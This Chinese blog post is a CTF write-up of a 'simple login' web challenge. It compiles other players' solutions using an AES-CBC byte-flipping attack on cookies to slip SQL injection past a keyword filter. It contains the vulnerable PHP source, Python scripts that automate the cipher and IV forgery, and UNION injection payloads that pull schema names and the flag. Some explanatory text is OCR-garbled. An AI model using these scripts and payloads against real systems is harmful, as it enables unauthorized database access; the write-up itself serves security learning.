实验吧平台维护到现在一直都还没维护好,我的好多松果都凉凉了,现在到了暑假特意把以前做过的题翻来重新写成博客,主要的目的是为了学习做题的思路,当然还有的题当时不会做,也不懂原理,经过一年多的学习,也了解了一些,所以就特意写写加强记忆。实践才是真理!(唯一可惜的是没有原题环境练习了)
1.简单的的登录题---(主要考察cbc字节反转攻击)
当时,这一题看标题以为是很简单的SQL注入啥的,结果看到50的分值,通过率只有15%,可见其难度之高,所以这里就参考别人的思路来展示:
作者:pcat
1.做题的初步收集、整理
index.php是一个普通的登录框,输入id来登录,我们用burpsuite抓下包,并使用Repeater功能。
1)当postid时候,返回包Set-cookie里包含iv和cipher,这2个英文单词玩密码学就很容易理解,iv就是InitializationVector(初始化向量),cipher就是密文
2)使用Repeater功能不断的发送相同的包,返回的iv和cipher都不一样,基本断定每次的iv值是随机生成,另外iv和cipher的格式都是先base64编码后再进行urlencode编码。这里啰嗦几句,不少人总看到base64解
码后的字符是乱码后,就问该怎么解密之类的话,其实不要搞混了,base64不是一种加密方式,只是一种编码方式,base64编码后可以让不可视字符可视化(这才是最大的作用),而不起任何加密作用。
3)把iv值经过urldecode再base64解码后用len()得到长度为16,基本猜测算法是aes,而且大胆猜测是aes的cbc模式
4)从id=1入手,发现有#和-都会被waf检测到
5)当cookies里有iv值和cipher值,然后不提交任何参数(包括id),就会显示Hello,猜测是根据传入的iv和cipher来解码后,再参与内部的sql查询出用户名
6)由于aes的key值不知道,我就觉得这题比较难做了,然后先按照web题的基本思路———扫描,打开御剑扫一下,幸运的发现test.php泄露了源码。
整理下源码中的逻辑:
*1若是postid,就先进行waf检测,检测过了才随机生成iv值,并且对array('id'=>$id)进行php的序列化操作,再进行aes加密,再分别对iv和cipher进行base64编码并设置到cookies
*2如果cookies里有iv和cipher,就对其base64解码,然后对其aes解密,再进行php反序列化,如果不能反序列化则返回解密后的明文的base64编码,如果可以则进行sql语句拼接,查询若是行数>0就显示其username列的值,否则都是Hello!
*3难点1,过滤了#-=,还有union和procedure
*4难点2,注入点在limit后面,而且后面还是",0",0本来就是让limit取出0行,而前面的逗号更是难弄掉
*5aes的加密模式aes-128-cbc
7)mysql语法,limit后面只能procedure还有forupdate,还有尝试了堆叠注入,也是不行。
8)本题算比较好点,mysql会显示错误信息,这就可以弄报错注入(当前是得有前提的)
2.构建能绕过过滤的payload
尝试了很多,发现postid=1;%00(这里关键是;%00)可以绕过去,然后登录后会显示Hello!rootzz,说明user表里的值是rootzz,而并不是我们所期待的flag值(如果那么简单就好了--)
关键的关键字都被过滤,这可怎么办?
这时候要冷静分析下。
1)直接postid时候是有过滤
2)在cookies解密出来是没有过滤,就直接拼接sql语句
于是我们可以大胆猜测,修改cookies的值来达到解密后的明文可以构造sql注入。
这并不是无的放矢,在密码学里是可以做到的
3.aes的cbcbyteflippingattack(cbc字节翻转攻击)
先放出参考文章,自己可以多去阅读
推荐英文文章:
http://resources.infosecinstitute.com/cbc-byte-flipping-attack-101-approach/
以下是中文译文(其中图片挂了,结合英文版就没问题):
http://wps2015.org/drops/drops/CBC%E5%AD%97%E8%8A%82%E7%BF%BB%E8%BD%AC%E6%94%BB%E5%87%BB-101Approach.html
==============
cbc字节翻转攻击,我就不叙述原理,我直接演示一个简单的操作:
把id=12的密文修改后解析为id=1#
这里因为序列化是php的,我先写了一个php文件,便于显示
<?php
$id=@$_POST['id'];
$info = array('id'=>$id);
$plain = serialize($info);
$row=ceil(strlen($plain)/16);
for($i=0;$i<$row;$i++){
echo substr($plain,$i*16,16).'<br/>';
}
?>
当postid=12时候,显示
a:1:{s:2:"id";s:
2:"12";}
每一行16个字节,这里12的2对应上一行{的偏离量是4
作者:Aluvion此时的偏移量(offset)为4,也就是说,如果我们要将 第2块第5个字符2 翻转为我们所需要的字符#,由于CBC模式的解密方式是:
该块的明文 = decrypt(该块的密文) ^(异或) 前一块密文
如果是第一块:第一块的明文 = decrypt(第一块的密文) ^ iv
CBC解密分为两段:decrypt和^
所以,我们需要对 第1块第5个字符 做一些修改
由于:
第2块密文第5个字符的明文(C) = 第1块密文第5个字符(A) ^ decrypt(第2块密文第5个字符的密文)(B)
而^有运算为:C = A ^ B,A = C ^ B,0 ^ A = A,而我们已知CBC解密后C(这里为2)和密文中A的值cipher_row[offset(偏移量)]
故:
B = A ^ C
而后台CBC解密所得则为:A ^ B
所以我们控制修改A2 = A ^ C ^ D(我们想要的,这里为#)
即脚本里的cipher_row[offset] =chr(ord(cipher_row[offset]) ^ord("2") ^ord("#"))
这样运算下来,则后台CBC解密得到:A2 ^ B = A ^ C ^ D ^ A ^C ,即D,CBC翻转成功
但是还没有结束,因为我们在翻转第二块的时候,修改了第一块的密文,所以如果用同一个iv去解密第一块密文,是无法反序列化的,因此我们需要对iv进行一些修改。
(如果我们为了翻转第三块,而修改了第二块,那我们又需要为了让第二块解密后反序列化成功修改第一块,最后又要修改iv,处理量一下子就多了起来)
修改iv的时候,我们已知:原iv,用原iv解密后的错误明文,第一块密文,以及正确明文(即a:1:{s:2:\"id\";s:)
而:
错误明文 = 原iv ^ 第一块密文 => 第一块密文 = 错误明文 ^ 原iv
正确明文 = 新iv ^ 第一块密文 => 新iv = 正确明文 ^ 第一块密文
故:
新iv = 原iv ^ 错误明文 ^ 正确明文
即脚本里的iv_new = iv_new +chr(ord(iv_row[x]) ^ord(wrong[x]) ^ord(plaintext[x])),循环16次
有这个准备后,
在原题里postid=12,得到下面(这只是示例)
iv=ZoP2z9EI7VWaWz%2F1GfYB6Q%3D%3D
cipher=U9qq54FOYcS2MFFB7UJFjVcSWpi0zsc%2BnVAnMkjkcRY%3D
运行以下脚本
# -*- coding:utf8 -*-
__author__='[email protected]'
from base64 import *
import urllib
cipher='U9qq54FOYcS2MFFB7UJFjVcSWpi0zsc%2BnVAnMkjkcRY%3D'
cipher_raw=b64decode(urllib.unquote(cipher))
lst=list(cipher_raw)
idx=4
c1='2'
c2='#'
lst[idx]=chr(ord(lst[idx])^ord(c1)^ord(c2))
cipher_new=''.join(lst)
cipher_new=urllib.quote(b64encode(cipher_new))
print cipher_new
得到cipher_new
U9qq55BOYcS2MFFB7UJFjVcSWpi0zsc%2BnVAnMkjkcRY%3D
再用之前的iv一起去访问,得到
base64_decode('g8COFrN/0Z3FDCOZ6MfV5zI6IjEjIjt9')can'tunserialize
这是因为iv值没修改,导致无法反序列化
运行以下脚本
# -*- coding:utf8 -*-
__author__='[email protected]'
from base64 import *
import urllib
iv='ZoP2z9EI7VWaWz%2F1GfYB6Q%3D%3D'
iv_raw=b64decode(urllib.unquote(iv))
first='a:1:{s:2:"id";s:'
plain=b64decode('g8COFrN/0Z3FDCOZ6MfV5zI6IjEjIjt9')
iv_new=''
for i in range(16):
iv_new+=chr(ord(plain[i])^ord(first[i])^ord(iv_raw[i]))
iv_new=urllib.quote(b64encode(iv_new))
print iv_new
得到iv_new
hHlJ4xkEBvpldXUI0wqnNA%3D%3D
再跟之前的cipher_new,一起去访问,得到
Hello!rootzz
也就是id=12顺利变成了id=1#注入成功。
离成功就差一步了,
1)把上面的过程编写成脚本
2)尽可能只翻转一个字节,例如把2nion翻转为union,末尾再用;%00来注释掉后面
3)由于逗号被过滤,用join来代替;等号被过滤,用regexp来代替
以下是我的脚本:
# -*-coding:utf-8-*-
# 请保留我的个人信息,谢谢~!
__author__='[email protected]'
from base64 import *
import urllib
import requests
import re
def mydecode(value):
return b64decode(urllib.unquote(value))
def myencode(value):
return urllib.quote(b64encode(value))
def mycbc(value,idx,c1,c2):
lst=list(value)
lst[idx]=chr(ord(lst[idx])^ord(c1)^ord(c2))
return ''.join(lst)
def pcat(payload,idx,c1,c2):
url=r'http://ctf5.shiyanbar.com/web/jiandan/index.php'
myd={'id':payload}
res=requests.post(url,data=myd)
cookies=res.headers['Set-Cookie']
iv=re.findall(r'iv=(.*?),',cookies)[0]
cipher=re.findall(r'cipher=(.*)',cookies)[0]
iv_raw=mydecode(iv)
cipher_raw=mydecode(cipher)
cipher_new=myencode(mycbc(cipher_raw,idx,c1,c2))
cookies_new={'iv':iv,'cipher':cipher_new}
cont=requests.get(url,cookies=cookies_new).content
plain=b64decode(re.findall(r"base64_decode\('(.*?)'\)",cont)[0])
first='a:1:{s:2:"id";s:'
iv_new=''
for i in range(16):
iv_new+=chr(ord(first[i])^ord(plain[i])^ord(iv_raw[i]))
iv_new=myencode(iv_new)
cookies_new={'iv':iv_new,'cipher':cipher_new}
cont=requests.get(url,cookies=cookies_new).content
print 'Payload:%s\n>> ' %(payload)
print cont
pass
def foo():
pcat('12',4,'2','#')
pcat('0 2nion select * from((select 1)a join (select 2)b join (select 3)c);'+chr(0),6,'2','u')
pcat('0 2nion select * from((select 1)a join (select group_concat(table_name) from information_schema.tables where table_schema regexp database())b join (select 3)c);'+chr(0),7,'2','u')
pcat("0 2nion select * from((select 1)a join (select group_concat(column_name) from information_schema.columns where table_name regexp 'you_want')b join (select 3)c);"+chr(0),7,'2','u')
pcat("0 2nion select * from((select 1)a join (select value from you_want limit 1)b join (select 3)c);"+chr(0),6,'2','u')
pass
if __name__ == '__main__':
foo()
print 'ok'
当时我运行了一下脚本:
上面的步骤已经介绍的很详细了,接下来我们可以再看另一位博主写的,我们不仅要学习解题的方法,更要学习他人的思路。
作者:蓝天深处
1、审题目:《简单的登录》,没有暴露任何信息(有些题目可能透露一些加密算法名字之类)
接下来想到的就是sql注入了,输入1'后页面显示Hello,重新载入的话页面返回报错信息
确实存在注入,看那后面的逗号,猜测注入点在limit后面。然后试了很多,发现题目把union,#,procedure等都过滤了,暂时没想到任何绕过的方法。
2、看下源代码,无异常;御剑扫后台,让它扫着的同时继续尝试其他方法;用Burp截获报文,修改id为admin之类敏感字眼,提交表单,看服务器返回的信息,还是无异常;当还在尝试id变换不同敏感字眼时,发现服务器返回了一个tips: test.php;看来御剑也不用忙活了,直接进这个网页看看。
3、得到一大串代码,接下来就是代码审计了。
<?php
define("SECRET_KEY", '***********');
define("METHOD", "aes-128-cbc");
error_reporting(0);
include('conn.php');
function sqliCheck($str){
if(preg_match("/\\\|,|-|#|=|~|union|like|procedure/i",$str)){
return 1;
}
return 0;
}
function get_random_iv(){
$random_iv='';
for($i=0;$i<16;$i++){
$random_iv.=chr(rand(1,255));
}
return $random_iv;
}
function login($info){
$iv = get_random_iv();
$plain = serialize($info);
$cipher = openssl_encrypt($plain, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);
setcookie("iv", base64_encode($iv));
setcookie("cipher", base64_encode($cipher));
}
function show_homepage(){
global $link;
if(isset($_COOKIE['cipher']) && isset($_COOKIE['iv'])){
$cipher = base64_decode($_COOKIE['cipher']);
$iv = base64_decode($_COOKIE["iv"]);
if($plain = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)){
$info = unserialize($plain) or die("<p>base64_decode('".base64_encode($plain)."') can't unserialize</p>");
$sql="select * from users limit ".$info['id'].",0";
$result=mysqli_query($link,$sql);
if(mysqli_num_rows($result)>0 or die(mysqli_error($link))){
$rows=mysqli_fetch_array($result);
echo '<h1><center>Hello!'.$rows['username'].'</center></h1>';
}
else{
echo '<h1><center>Hello!</center></h1>';
}
}else{
die("ERROR!");
}
}
}
if(isset($_POST['id'])){
$id = (string)$_POST['id'];
if(sqliCheck($id))
die("<h1 style='color:red'><center>sql inject detected!</center></h1>");
$info = array('id'=>$id);
login($info);
echo '<h1><center>Hello!</center></h1>';
}else{
if(isset($_COOKIE["iv"])&&isset($_COOKIE['cipher'])){
show_homepage();
}else{
echo '<body class="login-body" style="margin:0 auto">
<div id="wrapper" style="margin:0 auto;width:800px;">
<form name="login-form" class="login-form" action="" method="post">
<div class="header">
<h1>Login Form</h1>
<span>input id to login</span>
</div>
<div class="content">
<input name="id" type="text" class="input id" value="id" onfocus="this.value=\'\'" />
</div>
<div class="footer">
<p><input type="submit" name="submit" value="Login" class="button" /></p>
</div>
</form>
</div>
</body>';
}
}
这里说明几个函数:(来自:中北随便)
1.chr()函数,将数字转化为ASCII码的字符
2.serialize()函数,产生-个可存储的值的表示。
3.openssI_ encrypt()函数,用于加密数据
OpenssI_ encrypt($data,$method,$key,
[$options=0,$iv=" ”,&$tag=NUL,add=" ”,$tag_length=16])
1. data:要加密的明文消 息数据
2. method:密码方法
3. key:钥匙
4. options:options是一 个按位分离的旗帜OPENSSL_ RAW_ DATA和OPENSSL_ ZERO_ PADDING
5. iv:非NUL初始化变 量(非空的初始化向量,不使用此项会抛出一个警告)
6. tag:使用AEAD密码模式 (GCM或CCM)时,通过弓用传递的身份验证标记
7. add:其他认证数据
8. tag_ length:身 份验证的长度tag。对于GCM模式,其值可以在4到16之间
返回值:成功或者失败时返回加密的字符串。
补充: options有三种:
0:自动对明文进行padding,返回的数据经过base64编码
1: OPENSSL_ RAW_ DATA:自动对明文进行padding,但返回的结果未经过base64编码
2: OPENSSL_ ZERO_ PADDING:自动对明文进行0填充,返回的结果经过base64编码,但
是,openssI不推荐0填充的方式,即使选择此项也不会自动进行padding, 仍需手动padding
Padding简介: .
随机长度的填充
1. hash函数: 通常包括几种填充模式,通常用来防止hash函数被长度扩展攻击,许多填充
模式通过添加可预测的函数到最后一个块中完成填充。
2.分组密码的操作模式: CBC模式是分组密码操作模式的样例。在对称加算法的分组加密模
式中,要求明文必须是加密块的整数倍,这就要求必须对明文进行填充。
1.位填充: 可应用于任意长度的明文。
方法:将1添加至明文后面,后面的位全部置0
2.字节填充: 应用于明文可以编码成整字节的
ANSI X.923:字节填充方式以00字节填充并在最一个字节处后定义填充的字节数
ISO 10126:规定填充的字节应当是随机数并在最后-个字节处定义填充的字节数。
PKCS7:规定添加的字节是填充的字节数。
4.unserialize()函数,从已存储的表示中创建PHP的值
Serialize0和unserialize()函数:
用serialize0函数将-个实例转化位一个序列化的字符串。
用unserialize()函数还原已经序列化的对象。
列化:将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当
前状态写入到临时或者持久性存储区。可以通过从存储区中读取或反序列化对象的状态,重新
创建该对象。
序列化的意义: 1.将数组从内存中存储到硬盘中,减轻内存的使用量。
2.在网络上传送字节序列。
5.die()函数输出一条消息,并退出当前脚本,是exit)函数的别名 。
差不多就是这么多函数了,然后我们分析完- -遍之后, 提取出两处最重要的代码: .
preg_ match("A\.I-|#l=|~lunionlikelprocedure/i*"$str)
$sq|="select * from users limit ".$info[id'].",0";
我们需要绕过正则过滤并且让$info[ "id" 后面的内容失效即可。
不着急,先介绍一下AES-128-CBC的加密算法
1. AES-128-CBC是- 种分组对称加密算法,即用同-种key进行明文和密文的转换,以
128bit为一组,128bit==16Byte, 意思就是明文的16字节为一组对应加密后的1 6字节的密
文。
2. Padding方式: 采用PKCS7进行填充。比如最后缺3给字节,则填充3个字节的0x03;若最
后缺10个字节,则填充10个字节的0x0a;若明文正好是16个字节的整数倍,最后要再加入一
个16字节0x10的组再进行加密。
3.加密方式: 先随机产生随机初始化变量IV和密匙,IV最 后会和密文拼接在一起从而保证了
同样的明文在加密后也不会拥有相同的密文。
4.具体方法:
加密:
1. 首先将明文分组(常见的以16字节为-组),位数不足的使用特殊字符填充。
2.生成一个随机的初始化向量(IV) 和一个密钥。
3.将IV和第一 组明文异或
4.用密钥对3中xor后产生的密文加密。
5.用4中产生的密文对第 二组密文进行xor操作。
6.用密钥对5中产生的密文进行xor加密。
7.重复4-7,到最后- -组明文。
8.将IV和加密后的密文拼接在一 起,得到最终的密文。
解密:
1. 先从密文中取出IV,然后对剩下的密文分组(16字节为-组)。
2.使用密钥解密第一 组密文,将解密结果与IV做异或运算,得到明文1。
3.然后使用密钥解第二组密文,将解密的结果与上一组密文进行异或运算,得到明文2。
4.复2-3,直到所有密文解密完成。
4、代码实现的流程
a、提交上来的id,先进行关键字的过滤,防止SQL注入,包括=、-、#、union、like、procedure等等,如果检测到这些敏感字符,则会直接die并返回显示Sql inject detected。
b、通过过滤的id,服务器会返回两个值:iv与cipher
iv:随机生成的16位值,再经过base64转码
cipher:id序列化、预设的SECRET_KEY(打码)、上面得到的iv值,三者经过aes-128-cbc加密得到cipher值
服务器把iv、cipher设置到cookie然后返回,顺便还显示了一个Hello!
c、如果Post给服务器的报文,没有包括id,而且cookie里有iv和cipher值,则进入函数show_homepage();
d、 show_homepage()大致过程:将iv、cipher经过base64解码,然后把预设的SECRET_KEY(打码)、iv、cipher经过aes-128-cbc解密,得到plain
e、如果plain无法反序列化,则die并返回plain的base64编码数据;如果可以序列化,则将id值拼接到sql语句中“select * from users limit .$info['id'] ,0”,并提交到数据库,返回数据,并附在返回的Hello后。(备注:die() 函数输出一条消息,并退出当前脚本。)
5、从代码分析可以看出关键就在于这个sql语句 “select * from users limit .$info['id'] ,0”
正常的话,无论id输入什么值,都会无功而返,因此只能构造进行sql注入,具体要实现两点:
a、注释掉后面“,0”
b、id=1,从而构造为“select * from users limit 1”
注释做了很多尝试,由于过滤了#、--,所以尝试用%00,用Burp Repeater尝试,将id=1 %00,post提交,然后用返回的iv、cipher值,作为第二次的cookie,然后去掉“id=”再次post,结果能返回Hello!rootzz
(现在写出来比较简单,但是当时在不少细节上进了坑,得细心点看源代码啊)
(另外,从源代码来看,第二次无id Post时,并没有直接传入id,但既然能得到rootzz,从这可以猜测:此时的id由cipher值解密得到,为后续进一步工作奠定了基础)
6、居然不是flag,如果是flag多好啊,就这样美好的结束了,但也许幸福就是来之不易的吧
而且如果就这样能解决战斗的啊,还有一串代码的功能就毫无永无之地了,依据多年的考试经验,题目肯定不会这样出的,因此仔细分析源代码的逻辑,发现有个漏洞,虽然第一次提交id时,做了过滤,但是第二次提交iv和cipher值,是不会做过滤的,在这里跟pcat大神学习了,用cbc翻转一个字节进行攻击。具体如下:
a、提交能经过过滤检测的SQL语句,如id=12
b、结合得到的iv、cipher,用cbc字节翻转cipher对应id=12中2的字节,得到cipher_new,提交iv、cipher_new
c、第二次提交得到plain(如果忘了是啥可以往回看)
d、把iv、plain、‘id=12’序列第一行(16个字节为一行),进行异或操作,得到iv_new
e、把iv_new、cipher_new,去掉id=xx post到服务器即可得到 id=1# 的结果,即Hello!rootzz
7、上一步成功达到偷梁换日的做法,下一步就是把id=12换成我们熟悉的SQL注入语句,在这里要注意的是:注释还是用%00,=用regexp代替,逗号用join代替,union用2nion代替,然后用cbc字节转换,把2换成u。值得注意的是cbc字节转换时的偏移量,最好自己写个php代码算一下前一行相应的位置。
代码直接使用上面一位博主的代码即可。
这里还需要注意的是:1;%00截断的问题,测试的时候发现1%00会引起php报错,但是1;%00就不会,因为;%00本来就是一个注释符
扩展:
CBC解密以及字节翻转攻击